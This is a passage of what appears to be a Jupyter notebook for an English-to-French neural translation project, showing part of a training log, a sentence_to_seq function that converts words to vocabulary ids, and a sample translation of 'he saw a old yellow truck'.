0.944, Validation Accuracy: 0.928, Loss: 0.887\nEpoch 2 Batch 180/538 - 
Train Accuracy: 0.938, Validation Accuracy: 0.925, Loss: 0.902\nEpoch 2 Batch 181/538 - Train Accuracy: 0.911, Validation Accuracy: 0.919, Loss: 0.932\nEpoch 2 Batch 182/538 - Train Accuracy: 0.948, Validation Accuracy: 0.920, Loss: 0.962\nEpoch 2 Batch 183/538 - Train Accuracy: 0.945, Validation Accuracy: 0.918, Loss: 0.923\nEpoch 2 Batch 184/538 - Train Accuracy: 0.937, Validation Accuracy: 0.924, Loss: 0.929\nEpoch 2 Batch 185/538 - Train Accuracy: 0.948, Validation Accuracy: 0.924, Loss: 0.921\nEpoch 2 Batch 186/538 - Train Accuracy: 0.935, Validation Accuracy: 0.934, Loss: 0.915\nEpoch 2 Batch 187/538 - Train Accuracy: 0.930, Validation Accuracy: 0.939, Loss: 0.925\nEpoch 2 Batch 188/538 - Train Accuracy: 0.942, Validation Accuracy: 0.932, Loss: 0.898\nEpoch 2 Batch 189/538 - Train Accuracy: 0.937, Validation Accuracy: 0.932, Loss: 0.938\nEpoch 2 Batch 190/538 - Train Accuracy: 0.921, Validation Accuracy: 0.926, Loss: 0.959\nEpoch 2 Batch 191/538 - Train Accuracy: 0.939, Validation Accuracy: 0.925, Loss: 0.926\nEpoch 2 Batch 192/538 - Train Accuracy: 0.937, Validation Accuracy: 0.929, Loss: 0.964\nEpoch 2 Batch 193/538 - Train Accuracy: 0.932, Validation Accuracy: 0.931, Loss: 0.925\nEpoch 2 Batch 194/538 - Train Accuracy: 0.913, Validation Accuracy: 0.935, Loss: 0.934\nEpoch 2 Batch 195/538 - Train Accuracy: 0.932, Validation Accuracy: 0.927, Loss: 0.925\nEpoch 2 Batch 196/538 - Train Accuracy: 0.928, Validation Accuracy: 0.928, Loss: 0.909\nEpoch 2 Batch 197/538 - Train Accuracy: 0.927, Validation Accuracy: 0.931, Loss: 0.948\nEpoch 2 Batch 198/538 - Train Accuracy: 0.939, Validation Accuracy: 0.931, Loss: 0.960\nEpoch 2 Batch 199/538 - Train Accuracy: 0.923, Validation Accuracy: 0.926, Loss: 0.901\nEpoch 2 Batch 200/538 - Train Accuracy: 0.942, Validation Accuracy: 0.928, Loss: 0.904\nEpoch 2 Batch 201/538 - Train Accuracy: 0.932, Validation Accuracy: 0.927, Loss: 0.909\nEpoch 2 Batch 202/538 - Train Accuracy: 0.925, Validation Accuracy: 0.921, Loss: 0.909\nEpoch 2 Batch 203/538 - Train Accuracy: 0.917, Validation Accuracy: 0.920, Loss: 0.913\nEpoch 2 Batch 204/538 - Train Accuracy: 0.928, Validation Accuracy: 0.918, Loss: 0.899\nEpoch 2 Batch 205/538 - Train Accuracy: 0.947, Validation Accuracy: 0.922, Loss: 0.930\nEpoch 2 Batch 206/538 - Train Accuracy: 0.931, Validation Accuracy: 0.922, Loss: 0.915\nEpoch 2 Batch 207/538 - Train Accuracy: 0.934, Validation Accuracy: 0.921, Loss: 0.907\nEpoch 2 Batch 208/538 - Train Accuracy: 0.924, Validation Accuracy: 0.928, Loss: 0.948\nEpoch 2 Batch 209/538 - Train Accuracy: 0.960, Validation Accuracy: 0.933, Loss: 0.917\nEpoch 2 Batch 210/538 - Train Accuracy: 0.913, Validation Accuracy: 0.932, Loss: 0.919\nEpoch 2 Batch 211/538 - Train Accuracy: 0.922, Validation Accuracy: 0.941, Loss: 0.905\nEpoch 2 Batch 212/538 - Train Accuracy: 0.923, Validation Accuracy: 0.939, Loss: 0.899\nEpoch 2 Batch 213/538 - Train Accuracy: 0.940, Validation Accuracy: 0.938, Loss: 0.897\nEpoch 2 Batch 214/538 - Train Accuracy: 0.944, Validation Accuracy: 0.941, Loss: 0.927\nEpoch 2 Batch 215/538 - Train Accuracy: 0.944, Validation Accuracy: 0.939, Loss: 0.922\nEpoch 2 Batch 216/538 - Train Accuracy: 0.930, Validation Accuracy: 0.933, Loss: 0.886\nEpoch 2 Batch 217/538 - Train Accuracy: 0.940, Validation Accuracy: 0.935, Loss: 0.922\nEpoch 2 Batch 218/538 - Train Accuracy: 0.922, Validation Accuracy: 0.934, Loss: 0.890\nEpoch 2 Batch 219/538 - Train Accuracy: 0.913, Validation Accuracy: 0.929, Loss: 0.956\nEpoch 2 Batch 220/538 - Train Accuracy: 0.916, Validation 
Accuracy: 0.924, Loss: 0.922\nEpoch 2 Batch 221/538 - Train Accuracy: 0.941, Validation Accuracy: 0.920, Loss: 0.898\nEpoch 2 Batch 222/538 - Train Accuracy: 0.921, Validation Accuracy: 0.917, Loss: 0.967\nEpoch 2 Batch 223/538 - Train Accuracy: 0.931, Validation Accuracy: 0.925, Loss: 0.917\nEpoch 2 Batch 224/538 - Train Accuracy: 0.926, Validation Accuracy: 0.926, Loss: 0.936\nEpoch 2 Batch 225/538 - Train Accuracy: 0.928, Validation Accuracy: 0.922, Loss: 0.927\nEpoch 2 Batch 226/538 - Train Accuracy: 0.927, Validation Accuracy: 0.926, Loss: 0.934\nEpoch 2 Batch 227/538 - Train Accuracy: 0.937, Validation Accuracy: 0.931, Loss: 0.895\nEpoch 2 Batch 228/538 - Train Accuracy: 0.936, Validation Accuracy: 0.928, Loss: 0.895\nEpoch 2 Batch 229/538 - Train Accuracy: 0.938, Validation Accuracy: 0.931, Loss: 0.908\nEpoch 2 Batch 230/538 - Train Accuracy: 0.925, Validation Accuracy: 0.925, Loss: 0.917\nEpoch 2 Batch 231/538 - Train Accuracy: 0.912, Validation Accuracy: 0.928, Loss: 0.932\nEpoch 2 Batch 232/538 - Train Accuracy: 0.921, Validation Accuracy: 0.930, Loss: 0.980\nEpoch 2 Batch 233/538 - Train Accuracy: 0.943, Validation Accuracy: 0.928, Loss: 0.959\nEpoch 2 Batch 234/538 - Train Accuracy: 0.933, Validation Accuracy: 0.930, Loss: 0.942\nEpoch 2 Batch 235/538 - Train Accuracy: 0.935, Validation Accuracy: 0.929, Loss: 0.923\nEpoch 2 Batch 236/538 - Train Accuracy: 0.927, Validation Accuracy: 0.932, Loss: 0.887\nEpoch 2 Batch 237/538 - Train Accuracy: 0.927, Validation Accuracy: 0.935, Loss: 0.969\nEpoch 2 Batch 238/538 - Train Accuracy: 0.945, Validation Accuracy: 0.926, Loss: 0.919\nEpoch 2 Batch 239/538 - Train Accuracy: 0.918, Validation Accuracy: 0.926, Loss: 0.958\nEpoch 2 Batch 240/538 - Train Accuracy: 0.920, Validation Accuracy: 0.923, Loss: 0.919\nEpoch 2 Batch 241/538 - Train Accuracy: 0.936, Validation Accuracy: 0.922, Loss: 0.905\nEpoch 2 Batch 242/538 - Train Accuracy: 0.940, Validation Accuracy: 0.922, Loss: 0.939\nEpoch 2 Batch 243/538 - Train Accuracy: 0.945, Validation Accuracy: 0.928, Loss: 0.967\nEpoch 2 Batch 244/538 - Train Accuracy: 0.927, Validation Accuracy: 0.925, Loss: 0.931\nEpoch 2 Batch 245/538 - Train Accuracy: 0.949, Validation Accuracy: 0.926, Loss: 0.929\nEpoch 2 Batch 246/538 - Train Accuracy: 0.944, Validation Accuracy: 0.921, Loss: 0.901\nEpoch 2 Batch 247/538 - Train Accuracy: 0.922, Validation Accuracy: 0.917, Loss: 0.873\nEpoch 2 Batch 248/538 - Train Accuracy: 0.937, Validation Accuracy: 0.919, Loss: 0.949\nEpoch 2 Batch 249/538 - Train Accuracy: 0.932, Validation Accuracy: 0.921, Loss: 0.945\nEpoch 2 Batch 250/538 - Train Accuracy: 0.929, Validation Accuracy: 0.920, Loss: 0.902\nEpoch 2 Batch 251/538 - Train Accuracy: 0.939, Validation Accuracy: 0.922, Loss: 0.937\nEpoch 2 Batch 252/538 - Train Accuracy: 0.935, Validation Accuracy: 0.932, Loss: 0.925\nEpoch 2 Batch 253/538 - Train Accuracy: 0.909, Validation Accuracy: 0.923, Loss: 0.927\nEpoch 2 Batch 254/538 - Train Accuracy: 0.902, Validation Accuracy: 0.926, Loss: 0.916\nEpoch 2 Batch 255/538 - Train Accuracy: 0.941, Validation Accuracy: 0.927, Loss: 0.922\nEpoch 2 Batch 256/538 - Train Accuracy: 0.926, Validation Accuracy: 0.925, Loss: 0.964\nEpoch 2 Batch 257/538 - Train Accuracy: 0.926, Validation Accuracy: 0.931, Loss: 0.895\nEpoch 2 Batch 258/538 - Train Accuracy: 0.947, Validation Accuracy: 0.928, Loss: 0.913\nEpoch 2 Batch 259/538 - Train Accuracy: 0.948, Validation Accuracy: 0.924, Loss: 0.913\nEpoch 2 Batch 260/538 - Train Accuracy: 0.918, Validation Accuracy: 0.917, Loss: 
0.914\nEpoch 2 Batch 261/538 - Train Accuracy: 0.936, Validation Accuracy: 0.915, Loss: 0.918\nEpoch 2 Batch 262/538 - Train Accuracy: 0.942, Validation Accuracy: 0.917, Loss: 0.926\nEpoch 2 Batch 263/538 - Train Accuracy: 0.910, Validation Accuracy: 0.914, Loss: 0.946\nEpoch 2 Batch 264/538 - Train Accuracy: 0.924, Validation Accuracy: 0.904, Loss: 0.899\nEpoch 2 Batch 265/538 - Train Accuracy: 0.920, Validation Accuracy: 0.906, Loss: 0.925\nEpoch 2 Batch 266/538 - Train Accuracy: 0.917, Validation Accuracy: 0.901, Loss: 0.918\nEpoch 2 Batch 267/538 - Train Accuracy: 0.932, Validation Accuracy: 0.904, Loss: 0.917\nEpoch 2 Batch 268/538 - Train Accuracy: 0.951, Validation Accuracy: 0.904, Loss: 0.948\nEpoch 2 Batch 269/538 - Train Accuracy: 0.936, Validation Accuracy: 0.899, Loss: 0.914\nEpoch 2 Batch 270/538 - Train Accuracy: 0.940, Validation Accuracy: 0.900, Loss: 0.897\nEpoch 2 Batch 271/538 - Train Accuracy: 0.910, Validation Accuracy: 0.903, Loss: 0.899\nEpoch 2 Batch 272/538 - Train Accuracy: 0.919, Validation Accuracy: 0.907, Loss: 0.891\nEpoch 2 Batch 273/538 - Train Accuracy: 0.920, Validation Accuracy: 0.913, Loss: 0.920\nEpoch 2 Batch 274/538 - Train Accuracy: 0.886, Validation Accuracy: 0.910, Loss: 0.929\nEpoch 2 Batch 275/538 - Train Accuracy: 0.920, Validation Accuracy: 0.913, Loss: 0.939\nEpoch 2 Batch 276/538 - Train Accuracy: 0.929, Validation Accuracy: 0.921, Loss: 0.909\nEpoch 2 Batch 277/538 - Train Accuracy: 0.939, Validation Accuracy: 0.922, Loss: 0.916\nEpoch 2 Batch 278/538 - Train Accuracy: 0.921, Validation Accuracy: 0.928, Loss: 0.913\nEpoch 2 Batch 279/538 - Train Accuracy: 0.939, Validation Accuracy: 0.930, Loss: 0.934\nEpoch 2 Batch 280/538 - Train Accuracy: 0.929, Validation Accuracy: 0.928, Loss: 0.887\nEpoch 2 Batch 281/538 - Train Accuracy: 0.909, Validation Accuracy: 0.928, Loss: 0.937\nEpoch 2 Batch 282/538 - Train Accuracy: 0.926, Validation Accuracy: 0.929, Loss: 0.860\nEpoch 2 Batch 283/538 - Train Accuracy: 0.946, Validation Accuracy: 0.926, Loss: 0.887\nEpoch 2 Batch 284/538 - Train Accuracy: 0.926, Validation Accuracy: 0.928, Loss: 0.938\nEpoch 2 Batch 285/538 - Train Accuracy: 0.931, Validation Accuracy: 0.933, Loss: 0.873\nEpoch 2 Batch 286/538 - Train Accuracy: 0.908, Validation Accuracy: 0.926, Loss: 0.950\nEpoch 2 Batch 287/538 - Train Accuracy: 0.942, Validation Accuracy: 0.929, Loss: 0.863\nEpoch 2 Batch 288/538 - Train Accuracy: 0.945, Validation Accuracy: 0.927, Loss: 0.906\nEpoch 2 Batch 289/538 - Train Accuracy: 0.940, Validation Accuracy: 0.928, Loss: 0.894\nEpoch 2 Batch 290/538 - Train Accuracy: 0.936, Validation Accuracy: 0.925, Loss: 0.929\nEpoch 2 Batch 291/538 - Train Accuracy: 0.938, Validation Accuracy: 0.921, Loss: 0.952\nEpoch 2 Batch 292/538 - Train Accuracy: 0.940, Validation Accuracy: 0.926, Loss: 0.902\nEpoch 2 Batch 293/538 - Train Accuracy: 0.936, Validation Accuracy: 0.930, Loss: 0.947\nEpoch 2 Batch 294/538 - Train Accuracy: 0.912, Validation Accuracy: 0.928, Loss: 0.881\nEpoch 2 Batch 295/538 - Train Accuracy: 0.943, Validation Accuracy: 0.927, Loss: 0.890\nEpoch 2 Batch 296/538 - Train Accuracy: 0.920, Validation Accuracy: 0.923, Loss: 0.892\nEpoch 2 Batch 297/538 - Train Accuracy: 0.954, Validation Accuracy: 0.926, Loss: 0.887\nEpoch 2 Batch 298/538 - Train Accuracy: 0.904, Validation Accuracy: 0.923, Loss: 0.912\nEpoch 2 Batch 299/538 - Train Accuracy: 0.924, Validation Accuracy: 0.925, Loss: 0.865\nEpoch 2 Batch 300/538 - Train Accuracy: 0.930, Validation Accuracy: 0.928, Loss: 0.899\nEpoch 2 Batch 301/538 - 
Train Accuracy: 0.937, Validation Accuracy: 0.935, Loss: 0.908\nEpoch 2 Batch 302/538 - Train Accuracy: 0.937, Validation Accuracy: 0.933, Loss: 0.901\nEpoch 2 Batch 303/538 - Train Accuracy: 0.939, Validation Accuracy: 0.925, Loss: 0.927\nEpoch 2 Batch 304/538 - Train Accuracy: 0.923, Validation Accuracy: 0.933, Loss: 0.924\nEpoch 2 Batch 305/538 - Train Accuracy: 0.936, Validation Accuracy: 0.930, Loss: 0.972\nEpoch 2 Batch 306/538 - Train Accuracy: 0.924, Validation Accuracy: 0.931, Loss: 0.934\nEpoch 2 Batch 307/538 - Train Accuracy: 0.946, Validation Accuracy: 0.943, Loss: 0.947\nEpoch 2 Batch 308/538 - Train Accuracy: 0.945, Validation Accuracy: 0.947, Loss: 0.944\nEpoch 2 Batch 309/538 - Train Accuracy: 0.936, Validation Accuracy: 0.953, Loss: 0.929\nEpoch 2 Batch 310/538 - Train Accuracy: 0.953, Validation Accuracy: 0.950, Loss: 0.937\nEpoch 2 Batch 311/538 - Train Accuracy: 0.921, Validation Accuracy: 0.946, Loss: 0.899\nEpoch 2 Batch 312/538 - Train Accuracy: 0.937, Validation Accuracy: 0.935, Loss: 0.884\nEpoch 2 Batch 313/538 - Train Accuracy: 0.936, Validation Accuracy: 0.934, Loss: 0.871\nEpoch 2 Batch 314/538 - Train Accuracy: 0.935, Validation Accuracy: 0.942, Loss: 0.917\nEpoch 2 Batch 315/538 - Train Accuracy: 0.932, Validation Accuracy: 0.941, Loss: 0.925\nEpoch 2 Batch 316/538 - Train Accuracy: 0.929, Validation Accuracy: 0.940, Loss: 0.879\nEpoch 2 Batch 317/538 - Train Accuracy: 0.925, Validation Accuracy: 0.936, Loss: 0.926\nEpoch 2 Batch 318/538 - Train Accuracy: 0.916, Validation Accuracy: 0.939, Loss: 0.934\nEpoch 2 Batch 319/538 - Train Accuracy: 0.939, Validation Accuracy: 0.939, Loss: 0.904\nEpoch 2 Batch 320/538 - Train Accuracy: 0.917, Validation Accuracy: 0.936, Loss: 0.902\nEpoch 2 Batch 321/538 - Train Accuracy: 0.929, Validation Accuracy: 0.936, Loss: 0.874\nEpoch 2 Batch 322/538 - Train Accuracy: 0.939, Validation Accuracy: 0.927, Loss: 0.953\nEpoch 2 Batch 323/538 - Train Accuracy: 0.943, Validation Accuracy: 0.922, Loss: 0.915\nEpoch 2 Batch 324/538 - Train Accuracy: 0.940, Validation Accuracy: 0.926, Loss: 0.924\nEpoch 2 Batch 325/538 - Train Accuracy: 0.941, Validation Accuracy: 0.924, Loss: 0.946\nEpoch 2 Batch 326/538 - Train Accuracy: 0.958, Validation Accuracy: 0.921, Loss: 0.948\nEpoch 2 Batch 327/538 - Train Accuracy: 0.928, Validation Accuracy: 0.924, Loss: 0.927\nEpoch 2 Batch 328/538 - Train Accuracy: 0.953, Validation Accuracy: 0.920, Loss: 0.922\nEpoch 2 Batch 329/538 - Train Accuracy: 0.948, Validation Accuracy: 0.919, Loss: 0.893\nEpoch 2 Batch 330/538 - Train Accuracy: 0.952, Validation Accuracy: 0.918, Loss: 0.907\nEpoch 2 Batch 331/538 - Train Accuracy: 0.945, Validation Accuracy: 0.919, Loss: 0.889\nEpoch 2 Batch 332/538 - Train Accuracy: 0.941, Validation Accuracy: 0.925, Loss: 0.911\nEpoch 2 Batch 333/538 - Train Accuracy: 0.939, Validation Accuracy: 0.918, Loss: 0.955\nEpoch 2 Batch 334/538 - Train Accuracy: 0.941, Validation Accuracy: 0.922, Loss: 0.923\nEpoch 2 Batch 335/538 - Train Accuracy: 0.938, Validation Accuracy: 0.926, Loss: 0.876\nEpoch 2 Batch 336/538 - Train Accuracy: 0.935, Validation Accuracy: 0.931, Loss: 0.970\nEpoch 2 Batch 337/538 - Train Accuracy: 0.925, Validation Accuracy: 0.934, Loss: 0.916\nEpoch 2 Batch 338/538 - Train Accuracy: 0.937, Validation Accuracy: 0.938, Loss: 0.912\nEpoch 2 Batch 339/538 - Train Accuracy: 0.930, Validation Accuracy: 0.936, Loss: 0.919\nEpoch 2 Batch 340/538 - Train Accuracy: 0.934, Validation Accuracy: 0.934, Loss: 0.874\nEpoch 2 Batch 341/538 - Train Accuracy: 0.943, Validation 
Accuracy: 0.930, Loss: 0.945\nEpoch 2 Batch 342/538 - Train Accuracy: 0.923, Validation Accuracy: 0.931, Loss: 0.943\nEpoch 2 Batch 343/538 - Train Accuracy: 0.929, Validation Accuracy: 0.930, Loss: 0.877\nEpoch 2 Batch 344/538 - Train Accuracy: 0.952, Validation Accuracy: 0.936, Loss: 0.896\nEpoch 2 Batch 345/538 - Train Accuracy: 0.947, Validation Accuracy: 0.931, Loss: 0.931\nEpoch 2 Batch 346/538 - Train Accuracy: 0.911, Validation Accuracy: 0.919, Loss: 0.924\nEpoch 2 Batch 347/538 - Train Accuracy: 0.950, Validation Accuracy: 0.918, Loss: 0.851\nEpoch 2 Batch 348/538 - Train Accuracy: 0.922, Validation Accuracy: 0.919, Loss: 0.884\nEpoch 2 Batch 349/538 - Train Accuracy: 0.954, Validation Accuracy: 0.921, Loss: 0.923\nEpoch 2 Batch 350/538 - Train Accuracy: 0.922, Validation Accuracy: 0.925, Loss: 0.963\nEpoch 2 Batch 351/538 - Train Accuracy: 0.932, Validation Accuracy: 0.925, Loss: 0.938\nEpoch 2 Batch 352/538 - Train Accuracy: 0.913, Validation Accuracy: 0.925, Loss: 0.893\nEpoch 2 Batch 353/538 - Train Accuracy: 0.923, Validation Accuracy: 0.923, Loss: 0.918\nEpoch 2 Batch 354/538 - Train Accuracy: 0.932, Validation Accuracy: 0.927, Loss: 0.898\nEpoch 2 Batch 355/538 - Train Accuracy: 0.942, Validation Accuracy: 0.930, Loss: 0.892\nEpoch 2 Batch 356/538 - Train Accuracy: 0.947, Validation Accuracy: 0.928, Loss: 0.952\nEpoch 2 Batch 357/538 - Train Accuracy: 0.922, Validation Accuracy: 0.933, Loss: 0.893\nEpoch 2 Batch 358/538 - Train Accuracy: 0.949, Validation Accuracy: 0.938, Loss: 0.928\nEpoch 2 Batch 359/538 - Train Accuracy: 0.930, Validation Accuracy: 0.937, Loss: 0.920\nEpoch 2 Batch 360/538 - Train Accuracy: 0.929, Validation Accuracy: 0.936, Loss: 0.908\nEpoch 2 Batch 361/538 - Train Accuracy: 0.948, Validation Accuracy: 0.940, Loss: 0.904\nEpoch 2 Batch 362/538 - Train Accuracy: 0.952, Validation Accuracy: 0.939, Loss: 0.920\nEpoch 2 Batch 363/538 - Train Accuracy: 0.952, Validation Accuracy: 0.937, Loss: 0.869\nEpoch 2 Batch 364/538 - Train Accuracy: 0.923, Validation Accuracy: 0.933, Loss: 0.896\nEpoch 2 Batch 365/538 - Train Accuracy: 0.937, Validation Accuracy: 0.931, Loss: 0.918\nEpoch 2 Batch 366/538 - Train Accuracy: 0.946, Validation Accuracy: 0.931, Loss: 0.895\nEpoch 2 Batch 367/538 - Train Accuracy: 0.943, Validation Accuracy: 0.934, Loss: 0.895\nEpoch 2 Batch 368/538 - Train Accuracy: 0.938, Validation Accuracy: 0.941, Loss: 0.895\nEpoch 2 Batch 369/538 - Train Accuracy: 0.941, Validation Accuracy: 0.936, Loss: 0.944\nEpoch 2 Batch 370/538 - Train Accuracy: 0.947, Validation Accuracy: 0.933, Loss: 0.926\nEpoch 2 Batch 371/538 - Train Accuracy: 0.947, Validation Accuracy: 0.933, Loss: 0.944\nEpoch 2 Batch 372/538 - Train Accuracy: 0.938, Validation Accuracy: 0.929, Loss: 0.929\nEpoch 2 Batch 373/538 - Train Accuracy: 0.921, Validation Accuracy: 0.925, Loss: 0.908\nEpoch 2 Batch 374/538 - Train Accuracy: 0.933, Validation Accuracy: 0.923, Loss: 0.896\nEpoch 2 Batch 375/538 - Train Accuracy: 0.934, Validation Accuracy: 0.920, Loss: 0.934\nEpoch 2 Batch 376/538 - Train Accuracy: 0.934, Validation Accuracy: 0.923, Loss: 0.933\nEpoch 2 Batch 377/538 - Train Accuracy: 0.950, Validation Accuracy: 0.926, Loss: 0.848\nEpoch 2 Batch 378/538 - Train Accuracy: 0.935, Validation Accuracy: 0.930, Loss: 0.920\nEpoch 2 Batch 379/538 - Train Accuracy: 0.939, Validation Accuracy: 0.935, Loss: 0.868\nEpoch 2 Batch 380/538 - Train Accuracy: 0.933, Validation Accuracy: 0.937, Loss: 0.937\nEpoch 2 Batch 381/538 - Train Accuracy: 0.948, Validation Accuracy: 0.941, Loss: 
0.914\nEpoch 2 Batch 382/538 - Train Accuracy: 0.922, Validation Accuracy: 0.945, Loss: 0.918\nEpoch 2 Batch 383/538 - Train Accuracy: 0.945, Validation Accuracy: 0.949, Loss: 0.909\nEpoch 2 Batch 384/538 - Train Accuracy: 0.933, Validation Accuracy: 0.942, Loss: 0.914\nEpoch 2 Batch 385/538 - Train Accuracy: 0.951, Validation Accuracy: 0.946, Loss: 0.895\nEpoch 2 Batch 386/538 - Train Accuracy: 0.942, Validation Accuracy: 0.942, Loss: 0.919\nEpoch 2 Batch 387/538 - Train Accuracy: 0.938, Validation Accuracy: 0.944, Loss: 0.929\nEpoch 2 Batch 388/538 - Train Accuracy: 0.940, Validation Accuracy: 0.942, Loss: 0.977\nEpoch 2 Batch 389/538 - Train Accuracy: 0.920, Validation Accuracy: 0.936, Loss: 0.905\nEpoch 2 Batch 390/538 - Train Accuracy: 0.937, Validation Accuracy: 0.934, Loss: 0.900\nEpoch 2 Batch 391/538 - Train Accuracy: 0.936, Validation Accuracy: 0.933, Loss: 0.885\nEpoch 2 Batch 392/538 - Train Accuracy: 0.924, Validation Accuracy: 0.937, Loss: 0.916\nEpoch 2 Batch 393/538 - Train Accuracy: 0.949, Validation Accuracy: 0.938, Loss: 0.900\nEpoch 2 Batch 394/538 - Train Accuracy: 0.915, Validation Accuracy: 0.938, Loss: 0.946\nEpoch 2 Batch 395/538 - Train Accuracy: 0.948, Validation Accuracy: 0.933, Loss: 0.916\nEpoch 2 Batch 396/538 - Train Accuracy: 0.922, Validation Accuracy: 0.930, Loss: 0.903\nEpoch 2 Batch 397/538 - Train Accuracy: 0.946, Validation Accuracy: 0.931, Loss: 0.924\nEpoch 2 Batch 398/538 - Train Accuracy: 0.931, Validation Accuracy: 0.934, Loss: 0.889\nEpoch 2 Batch 399/538 - Train Accuracy: 0.931, Validation Accuracy: 0.932, Loss: 0.888\nEpoch 2 Batch 400/538 - Train Accuracy: 0.941, Validation Accuracy: 0.937, Loss: 0.871\nEpoch 2 Batch 401/538 - Train Accuracy: 0.960, Validation Accuracy: 0.938, Loss: 0.933\nEpoch 2 Batch 402/538 - Train Accuracy: 0.929, Validation Accuracy: 0.932, Loss: 0.885\nEpoch 2 Batch 403/538 - Train Accuracy: 0.935, Validation Accuracy: 0.935, Loss: 0.933\nEpoch 2 Batch 404/538 - Train Accuracy: 0.942, Validation Accuracy: 0.931, Loss: 0.889\nEpoch 2 Batch 405/538 - Train Accuracy: 0.941, Validation Accuracy: 0.924, Loss: 0.950\nEpoch 2 Batch 406/538 - Train Accuracy: 0.921, Validation Accuracy: 0.923, Loss: 0.913\nEpoch 2 Batch 407/538 - Train Accuracy: 0.952, Validation Accuracy: 0.917, Loss: 0.933\nEpoch 2 Batch 408/538 - Train Accuracy: 0.926, Validation Accuracy: 0.919, Loss: 0.902\nEpoch 2 Batch 409/538 - Train Accuracy: 0.929, Validation Accuracy: 0.929, Loss: 0.920\nEpoch 2 Batch 410/538 - Train Accuracy: 0.954, Validation Accuracy: 0.930, Loss: 0.950\nEpoch 2 Batch 411/538 - Train Accuracy: 0.934, Validation Accuracy: 0.933, Loss: 0.931\nEpoch 2 Batch 412/538 - Train Accuracy: 0.936, Validation Accuracy: 0.931, Loss: 0.937\nEpoch 2 Batch 413/538 - Train Accuracy: 0.923, Validation Accuracy: 0.935, Loss: 0.921\nEpoch 2 Batch 414/538 - Train Accuracy: 0.908, Validation Accuracy: 0.929, Loss: 0.955\nEpoch 2 Batch 415/538 - Train Accuracy: 0.922, Validation Accuracy: 0.931, Loss: 0.913\nEpoch 2 Batch 416/538 - Train Accuracy: 0.942, Validation Accuracy: 0.929, Loss: 0.897\nEpoch 2 Batch 417/538 - Train Accuracy: 0.947, Validation Accuracy: 0.927, Loss: 0.908\nEpoch 2 Batch 418/538 - Train Accuracy: 0.933, Validation Accuracy: 0.933, Loss: 0.851\nEpoch 2 Batch 419/538 - Train Accuracy: 0.939, Validation Accuracy: 0.927, Loss: 0.876\nEpoch 2 Batch 420/538 - Train Accuracy: 0.947, Validation Accuracy: 0.922, Loss: 0.901\nEpoch 2 Batch 421/538 - Train Accuracy: 0.933, Validation Accuracy: 0.931, Loss: 0.903\nEpoch 2 Batch 422/538 - 
Train Accuracy: 0.918, Validation Accuracy: 0.923, Loss: 0.891\n[... per-batch training log truncated for readability: Epoch 2, Batches 423-536/538 report Train Accuracy roughly 0.91-0.97, Validation Accuracy roughly 0.91-0.95, and Loss roughly 0.86-0.97 ...]\nModel Trained and Saved\n"
]
],
[
[
"### Save Parameters\nSave the `batch_size` and `save_path` parameters for inference.",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\n# Save parameters for checkpoint\nhelper.save_params(save_path)",
"_____no_output_____"
]
],
[
[
"# Checkpoint",
"_____no_output_____"
]
],
[
[
"\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport helper\nimport problem_unittests as tests\n\n_, (source_vocab_to_int, target_vocab_to_int), (source_int_to_vocab, target_int_to_vocab) = helper.load_preprocess()\nload_path = helper.load_params()",
"_____no_output_____"
]
],
[
[
"## Sentence to Sequence\nTo feed a sentence into the model for translation, you first need to preprocess it. Implement the function `sentence_to_seq()` to preprocess new sentences.\n\n- Convert the sentence to lowercase\n- Convert words into ids using `vocab_to_int`\n- Convert words not in the vocabulary, to the `<UNK>` word id.",
"_____no_output_____"
]
],
[
[
"def sentence_to_seq(sentence, vocab_to_int):\n \"\"\"\n Convert a sentence to a sequence of ids\n :param sentence: String\n :param vocab_to_int: Dictionary to go from the words to an id\n :return: List of word ids\n \"\"\"\n # TODO: Implement Function\n word_ids = []\n words = sentence.lower().split()\n for l in words:\n if l in vocab_to_int:\n word_ids.append(vocab_to_int[l])\n else:\n word_ids.append(vocab_to_int['<UNK>'])\n\n return word_ids\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL THAT IS BELOW THIS LINE\n\"\"\"\ntests.test_sentence_to_seq(sentence_to_seq)",
"Tests Passed\n"
]
],
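[
[
"*Illustrative sanity check (added, not part of the graded project):* `sentence_to_seq` should map in-vocabulary words to their ids and everything else to the `<UNK>` id. The made-up word below is just a stand-in for any out-of-vocabulary token.",
"_____no_output_____"
],
[
"# Hedged example: 'zorblat' is not in the vocabulary, so its id should equal\n# the id of '<UNK>'; the other words get their regular vocabulary ids.\ndemo_ids = sentence_to_seq('he saw a zorblat truck .', source_vocab_to_int)\nprint(demo_ids)\nprint(demo_ids[3] == source_vocab_to_int['<UNK>'])",
"_____no_output_____"
]
],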
[
[
"## Translate\nThis will translate `translate_sentence` from English to French.",
"_____no_output_____"
]
],
[
[
"translate_sentence = 'he saw a old yellow truck .'\n\n\n\"\"\"\nDON'T MODIFY ANYTHING IN THIS CELL\n\"\"\"\ntranslate_sentence = sentence_to_seq(translate_sentence, source_vocab_to_int)\n\nloaded_graph = tf.Graph()\nwith tf.Session(graph=loaded_graph) as sess:\n # Load saved model\n loader = tf.train.import_meta_graph(load_path + '.meta')\n loader.restore(sess, load_path)\n\n input_data = loaded_graph.get_tensor_by_name('input:0')\n logits = loaded_graph.get_tensor_by_name('logits:0')\n keep_prob = loaded_graph.get_tensor_by_name('keep_prob:0')\n\n translate_logits = sess.run(logits, {input_data: [translate_sentence], keep_prob: 1.0})[0]\n\nprint('Input')\nprint(' Word Ids: {}'.format([i for i in translate_sentence]))\nprint(' English Words: {}'.format([source_int_to_vocab[i] for i in translate_sentence]))\n\nprint('\\nPrediction')\nprint(' Word Ids: {}'.format([i for i in np.argmax(translate_logits, 1)]))\nprint(' French Words: {}'.format([target_int_to_vocab[i] for i in np.argmax(translate_logits, 1)]))",
"Input\n Word Ids: [192, 171, 197, 79, 99, 229, 206]\n English Words: ['he', 'saw', 'a', 'old', 'yellow', 'truck', '.']\n\nPrediction\n Word Ids: [5, 348, 82, 215, 100, 218, 175, 180, 1]\n French Words: ['il', 'a', 'vu', 'un', 'vieux', 'camion', 'jaune', '.', '<EOS>']\n"
]
],
[
[
